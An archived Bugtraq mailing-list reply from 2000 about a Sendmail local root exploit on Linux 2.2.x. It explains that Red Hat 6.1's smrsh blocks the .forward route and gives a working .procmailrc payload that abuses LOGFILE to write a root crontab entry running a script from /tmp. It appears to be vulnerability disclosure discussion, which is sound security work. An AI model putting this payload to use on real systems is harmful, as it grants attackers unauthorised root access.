[15324] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Sendmail local root exploit on linux 2.2.x

daemon@ATHENA.MIT.EDU (Alan Iwi)
Wed Jun 14 15:32:20 2000

Message-Id:  <20000612092814.10345.qmail@securityfocus.com>
Date:         Mon, 12 Jun 2000 09:28:14 -0000
Reply-To: Alan Iwi <iwi@ATM.OX.AC.UK>
From: Alan Iwi <iwi@ATM.OX.AC.UK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <393F8FDC.882BAEE5@real-linux.de>

> then create a .forward with:
> |/path/to/add

I tried this on an out-of-the-box Redhat 6.1 system.
In fact, on this system sendmail is configured to use
smrsh, which forbids piping mail to arbitrary programs
with .forward.  But such systems are still vulnerable,
because sendmail is configured to run procmail.  Just
change the exploit to use a .procmailrc file instead of
.forward.  Here's an example:

        LOGFILE=/etc/crontab
        LOG="* * * * * root /tmp/my_dodgy_script.sh
        "
        LOGABSTRACT=no

        :0
        /dev/null

Alan


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[15324] in bugtraq

Re: Sendmail local root exploit on linux 2.2.x

daemon@ATHENA.MIT.EDU (Alan Iwi)Wed Jun 14 15:32:20 2000

daemon@ATHENA.MIT.EDU (Alan Iwi)
Wed Jun 14 15:32:20 2000